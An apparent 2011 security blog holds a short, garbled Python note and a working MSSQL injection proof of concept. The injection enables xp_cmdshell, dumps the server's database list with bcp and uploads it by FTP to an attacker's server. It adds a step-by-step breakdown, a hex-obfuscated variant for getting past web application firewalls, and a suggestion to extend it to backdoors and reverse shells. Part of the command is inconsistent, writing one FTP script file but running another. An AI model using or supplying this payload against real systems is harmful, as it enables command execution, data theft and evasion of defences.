Wednesday, March 9, 2011
Python tricks
Small notes to myself:
chr() command is used to convert int to character. CHAR is the syntax used in MSSQL, when analyzing the query you can add an additional mapping of the command with:
>>> CHAR=chr
Now you can perform the following command:
>>>CHAR()
chr(
>>> CHAR=chr
Now you can perform the following command:
>>>CHAR(
Wednesday, March 2, 2011
SQL Injection to Compromise OS
MSSQL Injection example to communicate with FTP server. The following POC can be extended to download/upload and execute Metasploit payloads to perform backdoors and reverse tcp connections. Discovered this with a customer who was directly compromised by this very attack vector:
Requirements: MSSQL running on System level (or equivalent) privileges. Where xp_* has not been ripped out.
Here is the query in its entirety:
Note: Replace ftp.microsoft.com with your FTP server, and user and password with your username and password.
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; exec master..xp_cmdshell 'mkdir temp& (echo open ftp.microsoft.com& echo user& echo password& echo binary& echo lcd temp& echo put file.txt file.txt& echo bye)>temp\ftpcommand.txt & (bcp "select name,dbid,crdate from master.dbo.sysdatabases" queryout b.txt -c -T & type b.txt& del b.txt) > temp\file.txt 2>&1 & ftp -s:temp\f3.txt & rmdir /S /Q temp';--
Break down:
Step 1 : Enable xp_cmdshell which is disabled by default on many SQL servers (2005):
sp_configure 'show advanced options', 1;
RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
Step 2: Create temporary directory:
exec master..xp_cmdshell 'mkdir temp&
Step 3: Create preset of FTP commands for execution. We will see this in the next step.
(echo open ftp.microsoft.com& echo user& echo password& echo binary& echo lcd temp& echo put file.txt file.txt& echo bye)>temp\ftpcommand.txt &
Step 4: Query MSSQL to show all Database and pipe into file.txt. FTP results to your server given the commands we created in Step 3:
(bcp "select name,dbid,crdate from master.dbo.sysdatabases" queryout b.txt -c -T & type b.txt& del b.txt) > temp\file.txt 2>&1 & ftp -s:temp\ftpcommand.txt & rmdir /S /Q temp';--
Recap:
This command essentially create a temporary directory "temp", pipes in a preset of FTP commands to upload file file.txt. It will then run a SQL query to pipe in the list database command into the temporary file. This file is then uploaded to the FTP server via ftp -s:temp\f3.txt which is the preset FTP commands defined. Subsequent clean up at the end (rmdir).
You can obviously expand this to upload/download backdoors to initiate reverse_tcp connections.
Additionally, some trivial obfuscation to mask the query with a hex encode, store it in a variable, then pipe that variable into "exec" to bypass primitive application firewalls that may key off on basic search strings:
declare @q varchar(8000) select @q = 0x455845432073705f636f6e666967757265202773686f7720616476616e636564206f7074696f6e73272c20313b5245434f4e4649475552453b455845432073705f636f6e666967757265202778705f636d647368656c6c272c20313b5245434f4e4649475552453b2065786563206d61737465722e2e78705f636d647368656c6c20276d6b6469722074656d702620286563686f206f70656e206674702e6d6963726f736f66742e636f6d26206563686f207573657226206563686f2070617373776f726426206563686f2062696e61727926206563686f206c63642074656d7026206563686f207075742066696c652e7478742066696c652e74787426206563686f20627965293e74656d705c667470636f6d6d616e642e74787420262028626370202273656c656374206e616d652c646269642c6372646174652066726f6d206d61737465722e64626f2e737973646174616261736573222071756572796f757420622e747874202d63202d542026207479706520622e747874262064656c20622e74787429203e2074656d705c66696c652e74787420323e2631202620667470202d733a74656d705c66332e747874202620726d646972202f53202f512074656d70273b2d2d exec(@q)
Subscribe to:
Posts (Atom)